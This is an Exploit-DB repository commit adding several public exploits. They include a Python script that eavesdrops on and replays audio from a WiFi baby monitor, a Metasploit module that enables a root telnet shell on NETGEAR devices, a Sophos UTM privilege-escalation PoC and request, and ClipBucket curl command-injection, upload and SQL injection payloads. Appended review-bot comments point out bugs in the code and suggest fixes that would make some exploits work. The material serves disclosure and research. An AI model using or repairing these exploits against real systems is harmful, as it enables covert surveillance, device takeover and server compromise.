DB: 2018-03-06
12 changes to exploits/shellcodes

Suricata < 4.0.4 - IDS Detection Bypass
ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions
Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit
Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow
Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)
Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)
Parallels Remote Application Server 15.5 - Path Traversal
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
This commit is contained in:
parent
aee073fb7e
commit
6a017b10c8
11 changed files with 1617 additions and 2 deletions
166
exploits/android/remote/44242.md
Normal file
@ -0,0 +1,166 @@
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.

Monitoring the traffic using Wireshark during the pairing process revealed:

- The initial connection is made on port 8257
- To start the pairing process, the same sequence is sent each time
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)

## Abusing The Protocol to Record Audio

With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.

The [very hacky] proof of concept code can be found below:

```
import socket
import sys
import time

if len(sys.argv) < 2:
print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
exit(1)

target = sys.argv[1]
port = 8257

if len(sys.argv) == 3:
port = int(sys.argv[2])

s = socket.socket()
s.connect((target, port))
s.send('\x01')
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
'\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
'\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
'\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
'\x33')

heartbeat_dump = open('dump.heartbeat.bin', 'wb')
data_dump = open('dump.data.bin', 'wb')

has_data_socket = False
data_socket = socket.socket()
delta = 0

while True:
time.sleep(1)
data = s.recv(2048)
if data is not None:
heartbeat_dump.write(data)
print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
s.send('\x01')

if has_data_socket:
data = data_socket.recv(2048)
if data is not None:
data_dump.write(data)
print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
data_socket.send('\x01')
else:
print '[*] Establishing data connection'
data_socket.connect((target, 8258))
data_socket.send('\x01')
data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
has_data_socket = True
print '[*] Established data connection'

delta += 1

heartbeat_dump.close
data_dump.close
```

This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.

Replaying the Recordings
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:

```
import socket
import sys
import time

s = socket.socket()
s.bind(('0.0.0.0', 8257))
s.listen(5)
print '[*] Heartbeat socket listening on port 8257'

data_socket = socket.socket()
data_socket.bind(('0.0.0.0', 8258))
data_socket.listen(5)
print '[*] Data socket listening on port 8258'

data = ''
with open('dump.heartbeat.bin', 'r') as replay_file:
data = replay_file.read()

wav_data = ''
with open('dump.data.bin', 'r') as wav_file:
wav_data = wav_file.read()

c, addr = s.accept()
print '[*] Connection from {client}'.format(client = addr)
c.send(data)

data_connection, addr = data_socket.accept()
print '[*] Data connection from {client}'.format(client = addr)
data_connection.send(wav_data)

buf_start = 0
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
buf = wav_data[buf_start:buf_end]

while buf is not None:
c.send('\x01')
print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
data_connection.send(buf)
time.sleep(0.1)

if buf_end == -1 or buf_start == -1:
buf = None
else:
buf_start = buf_end
buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
if buf_end == -1:
buf = wav_data[buf_start:]
else:
buf = wav_data[buf_start:buf_end]

data_connection.close()
c.close()
print '[*] Connection closed'
```

A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:

https://vimeo.com/258487598

## Solution

When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.

To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).

## CVE-ID

CVE-2018-7661

## CVSS Score

CVSS Base Score: 5.9
Impact Subscore: 4.2
Exploitability Subscore: 1.6
CVSS Temporal Score: 5.3
Overall CVSS Score: 5.3
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C

## Disclosure Timeline

2018-02-11: Initial contact with vendor to make them aware of the attack vector
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
2018-02-16: Vendor begins roll-out process for the new update
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
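Review bot: in the recording script, `if data is not None:` after both `s.recv(2048)` and `data_socket.recv(2048)` never detects a closed connection, because `recv` returns an empty string rather than `None` once the monitor hangs up; with `while True` and no break, the loop then keeps writing empty reads and sending `\x01` into a dead socket, so `if not data: break` after each `recv` is the check that is missing. Separately, `heartbeat_dump.close` and `data_dump.close` at the end reference the method without calling it (`heartbeat_dump.close()`), so the dump files are only flushed at process exit, and `delta` is incremented but never read. The `Replaying the Recordings` line is a plain line where the other section titles use `## `, so it will not render as a heading.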
242
exploits/hardware/remote/44245.rb
Executable file
@ -0,0 +1,242 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Capture

def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR TelnetEnable',
'Description' => %q{
This module sends a magic packet to a NETGEAR device to enable telnetd.
Upon successful connect, a root shell should be presented to the user.
},
'Author' => [
'Paul Gebheim', # Python PoC (TCP)
'insanid', # Python PoC (UDP)
'wvu', # Metasploit module
],
'References' => [
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
['URL', 'https://github.com/insanid/netgear-telenetenable']
],
'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))

register_options([
Opt::RPORT(23),
OptString.new('MAC', [false, 'MAC address of device']),
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end

def check
# Run through protocol detection
detect_proto

# This is a gamble, but it's the closest we can get
if @proto == :tcp
CheckCode::Detected
else
CheckCode::Unknown
end
end

def exploit
# Try to do the exploit unless telnetd is detected
@do_exploit = true

# Detect TCP or UDP and presence of telnetd
@proto = target[:proto]
detect_proto if @proto == :auto

# Use supplied or ARP-cached MAC address
configure_mac if @do_exploit

# Use supplied or default creds
configure_creds if @do_exploit

# Shell it
exploit_telnetenabled if @do_exploit
connect_telnetd
end

def detect_proto
begin
connect

res = begin
sock.get_once || ''
rescue EOFError
''
end

# telnetenabled returns no data, unlike telnetd
if res.length == 0
print_good('Detected telnetenabled on TCP')
else
print_good('Detected telnetd on TCP')
@do_exploit = false
end

@proto = :tcp
# It's UDP... and we may not get an ICMP error...
rescue Rex::ConnectionError
print_good('Detected telnetenabled on UDP')
@proto = :udp
ensure
disconnect
end
end

def configure_mac
@mac = datastore['MAC']

return if @mac

print_status('Attempting to discover MAC address via ARP')

begin
open_pcap
@mac = lookup_eth(rhost).first
rescue RuntimeError
fail_with(Failure::BadConfig, 'Superuser access required')
ensure
close_pcap
end

if @mac
print_good("Found MAC address #{@mac}")
else
fail_with(Failure::Unknown, 'Could not find MAC address')
end
end

def configure_creds
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]

# Try to use default creds if no creds were found
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end

print_good("Using creds #{@username}:#{@password}")
end

def exploit_telnetenabled
print_status('Generating magic packet')
payload = magic_packet(@mac, @username, @password)

begin
print_status("Connecting to telnetenabled via #{@proto.upcase}")
@proto == :tcp ? connect : connect_udp
print_status('Sending magic packet')
@proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
rescue Rex::ConnectionError
fail_with(Failure::Disconnected, 'Something happened mid-connection!')
ensure
print_status('Disconnecting from telnetenabled')
@proto == :tcp ? disconnect : disconnect_udp
end

# Wait a couple seconds for telnetd to come up
print_status('Waiting for telnetd')
sleep(2)
end

def connect_telnetd
print_status('Connecting to telnetd')
connect
handler(sock)
end

# NOTE: This is almost a verbatim copy of the Python PoC
def magic_packet(mac, username, password)
mac = mac.gsub(/[:-]/, '').upcase

if mac.length != 12
fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
end
just_mac = mac.ljust(0x10, "\x00")

if username.length > 0x10
fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
end
just_username = username.ljust(0x10, "\x00")

if @proto == :tcp
if password.length > 0x10
fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
end
just_password = password.ljust(0x10, "\x00")
elsif @proto == :udp
# Thanks to Roberto Frenna for the reserved field analysis
if password.length > 0x21
fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
end
just_password = password.ljust(0x21, "\x00")
end

cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = Rex::Text.md5_raw(cleartext)

payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))

secret_key = 'AMBIT_TELNET_ENABLE+' + password

byte_swap(blowfish_encrypt(secret_key, payload))
end

def blowfish_encrypt(secret_key, payload)
cipher = OpenSSL::Cipher.new('bf-ecb').encrypt

cipher.padding = 0
cipher.key_len = secret_key.length
cipher.key = secret_key

cipher.update(payload) + cipher.final
end

def byte_swap(data)
data.unpack('N*').pack('V*')
end

end
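Review bot: `detect_proto` treats any `Rex::ConnectionError` on TCP port 23 as proof of the UDP variant (the comment `# It's UDP... and we may not get an ICMP error...` admits as much), so a host that is simply down or filtered is reported with `print_good('Detected telnetenabled on UDP')` and `exploit` then sends a UDP magic packet to it anyway; suggest rescuing `Rex::ConnectionRefused` separately from the timeout case, reporting the timeout with `print_error`, and having `check` return `CheckCode::Safe` or `Unknown` accordingly instead of `Unknown` for every non-TCP outcome. Also `configure_creds` prints `"Using creds #{@username}:#{@password}"` at `print_good` level, which puts the device password in the console log; `vprint_good` is the usual choice. Lastly, `'References'` and `'DisclosureDate' => 'Oct 30 2009'` only cover the TCP PoC, while the UDP path (the reserved-field analysis credited to Roberto Frenna inside `magic_packet`) has no reference entry.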
183
exploits/linux/local/44246.txt
Normal file
@ -0,0 +1,183 @@
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt


1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: UTM 9
Affected Version: 9.410
Platform: Embedded Linux
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
Impact: Privilege Escalation
Attack vector: SSH

2. Vulnerability Description

The attacker must know the password for the loginuser
account. The confd client is not available to the loginuser
account. However, the running service is accessible over
a network port on the loopback interface. By replaying the
network traffic required to obtain a SID from this service it
is possible to escalate privileges to root.

3. Technical Description

1. Obtain the a privileged session token

$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
loginuser@1.3.3.7's password:
$ python kl-loginuser-confd-priv_esc.py
pojiZSqWEUAUDNIQtSop

2. Using that session token, set the root password

POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:4444/
Content-Length: 422
Cookie: SID=pojiZSqWEUAUDNIQtSop
DNT: 1
Connection: close

{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":
"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":
"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:33:53 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 178895

{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]

3. Look for success message.

"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

4. Profit.

loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)

4. Mitigation and Remediation Recommendation

The vendor has addressed this vulnerability in version
9.508. Release notes and download instructions can be found at:

https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released


5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.21 - KoreLogic submits vulnerability details to Sophos.
2017.07.21 - Sophos acknowledges receipt.
2017.09.01 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.09.15 - KoreLogic requests an update on the status of this and
other vulnerabilities reported to Sophos.
2017.09.18 - Sophos informs KoreLogic that this issue will require
additional engineering and requests an extension of
the disclosure timeline.
2017.09.25 - 45 business days have elapsed since the vulnerability
was reported to Sophos.
2017.11.07 - 75 business days have elapsed since the vulnerability
was reported to Sophos.
2017.12.14 - 100 business days have elapsed since the vulnerability
was reported to Sophos.
2018.01.12 - KoreLogic requests an update from Sophos.
2018.01.15 - Sophos informs KoreLogic that the expected release date
for the UTM 9.5 MR 6 version containing the mitigation
is the middle of February.
2018.01.16 - 120 business days have elapsed since the vulnerability
was reported to Sophos.
2018.02.28 - 150 business days have elapsed since the vulnerability
was reported to Sophos.
2018.03.01 - UTM 9.508 released by Sophos.
2018.03.02 - KoreLogic public disclosure.

7. Proof of Concept

from socket import socket,AF_INET,SOCK_STREAM

class Exploit:
def __init__(self):
self.host = '127.0.0.1'
self.port = 4472
self.connected = False
self.s = None
return None
def disconnect(self):
self.s.close()
return True
def send_trigger(self):
packet_one =
'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
self.s.send(packet_one)
self.s.recv(4096)
packet_two =
'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
self.s.send(packet_two)
self.s.recv(4096)
packet_three =
'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
self.s.send(packet_three)
print self.s.recv(4096).strip()
return True
def connect(self):
self.s = socket(AF_INET, SOCK_STREAM)
self.s.connect((self.host,self.port))
self.connected = True
return True
def run(self):
self.connect()
self.send_trigger()
self.disconnect()
return True

if __name__=="__main__":
Exploit().run()


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
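Review bot: the proof of concept in section 7 does not run as committed: `packet_one =`, `packet_two =` and `packet_three =` each end the line after the `=`, so the hex literal on the following line is a separate statement and Python raises a SyntaxError on the bare assignment; either keep each assignment on one line or end the first line with a backslash. The script is also Python 2 only (`.decode('hex')` on a str and the `print` statement), which is worth stating beside the `$ python kl-loginuser-confd-priv_esc.py` invocation in section 3. In `send_trigger`, each `self.s.recv(4096)` reads at most one segment of the confd reply before the next packet is sent, so a reply split across segments is left in the buffer and surfaces in the next read, including the one whose output is printed as the SID. Minor: `self.connected` is set in `connect` but never consulted, and section 3 reads "Obtain the a privileged session token".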
57
exploits/multiple/dos/44247.txt
Normal file
@ -0,0 +1,57 @@
-----------------------------------------------------
Vulnerability Type: Detection Bypass
Affected Product: Suricata
Vulnerable version: <4.0.4
CVE number: CVE-2018-6794
Found: 25.01.2018
By: Kirill Shipulin (@kirill_wow), Positive Technologies
Severity: Medium
------------------------------------------

About Suricata:
---------------
Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community

Attack Description:
-------------------
If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.

Attack scenario TCP flow scheme:
Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server

IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.

This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.

Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.

PoС:
----
A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
There is also a traffic capture of this data injection technique.

Timeline Summary:
-----------------
2018-01-25: Issue submitted to the bug tracker.
2018-01-30: Patch ready.
2018-02-14: Suricata 4.0.4 containing the fix has been released.

References:
-----------
CVE-2018-6794
https://redmine.openinfosecfoundation.org/issues/2427

Contacts:
---------
Twitter: https://twitter.com/AttackDetection
Twitter: https://twitter.com/kirill_wow
Telegram: https://t.me/kirill_wow


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip
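Review bot: the file is committed under `exploits/multiple/dos/` while its own header reads `Vulnerability Type: Detection Bypass` and the text describes IDS evasion, not a denial of service; the commit message title (`Suricata < 4.0.4 - IDS Detection Bypass`) agrees with the header, so the path looks like the wrong category. The advisory also gives the reader no mitigation beyond the timeline entry `2018-02-14: Suricata 4.0.4 containing the fix has been released`; a one-line Mitigation section stating that upgrading to 4.0.4 closes the issue, and that Snort 2.9.4 was also found affected, would make the remediation explicit. Style: the Attack Description sentence (`If as a server side you break a normal TCP 3 way handshake packets order...`) would read more clearly as "If a server breaks the normal TCP three-way handshake order and injects response data before the handshake completes, the client still receives the data but some IDS engines skip content checks on it."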
245
exploits/php/webapps/44250.txt
Normal file
@ -0,0 +1,245 @@
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
-----------------------------------
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-----------------
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<<COMMAND HERE>>"
http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL : http://$HOST/actions/vote_channel.php
METHOD : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}";
}else{
//$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
{$userid}";
$sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
{$userid}";
$result = $db->Execute($sel);
foreach ($result as $row )
$current_likes = $row['likes'];
$decremented_like = $current_likes-1;
$query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
= $userid";
}
[...]

URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=emailExists&email=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$email = $_POST['email'];
$check = $db->select(tbl('users'),"email"," email='$email'");
if (!$check) {
echo "NO";
}
[...]

URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=userExists&username=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$username = $_POST['username'];
$check = $db->select(tbl('users'),"username"," username='$username'");
if (!$check) {
echo "NO";
}
[...]


Vulnerable / tested versions:
-----------------------------
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don't fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don't fully mitigate all issues.
|
||||
2018-01-29: Request update from vendor, no response.
|
||||
2018-02-06: Request update from vendor, no response.
|
||||
2018-02-08: Informing vendor of public release date
|
||||
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
|
||||
two weeks; postponing once again for two weeks
|
||||
2018-02-23: Request update from vendor.
|
||||
2018-02-26: Vendor publishes v4.0
|
||||
2018-02-27: Public release of security advisory
|
||||
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
The vendor provided the following patched version:
|
||||
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
None
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal
|
||||
Moscow - Munich - Kuala Lumpur - Singapore
|
||||
Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/career/index.html
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/contact/index.html
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Mail: research at sec-consult dot com
|
||||
Web: https://www.sec-consult.com
|
||||
Blog: http://blog.sec-consult.com
|
||||
Twitter: https://twitter.com/sec_consult
|
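Review bot: the blind SQL injection payload for /actions/vote_channel.php repeats the parameter name (`PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())`), so as written the POST body sends a `channelId` parameter whose value is `channelId=1-BENCHMARK(...)`, which does not land in the integer context the excerpt shows (`WHERE userid = {$userid}`); it should read `channelId=1-BENCHMARK(100000000, rand())`. The two commonAjax.php payloads (`email=1' or '1'='1`, `username=1' or '1'='1`) do match the single-quoted contexts in their excerpts.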
265
exploits/php/webapps/44252.py
Executable file
@ -0,0 +1,265 @@
#!/usr/bin/python2
# -*- coding:utf-8 -*-
'''

GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007

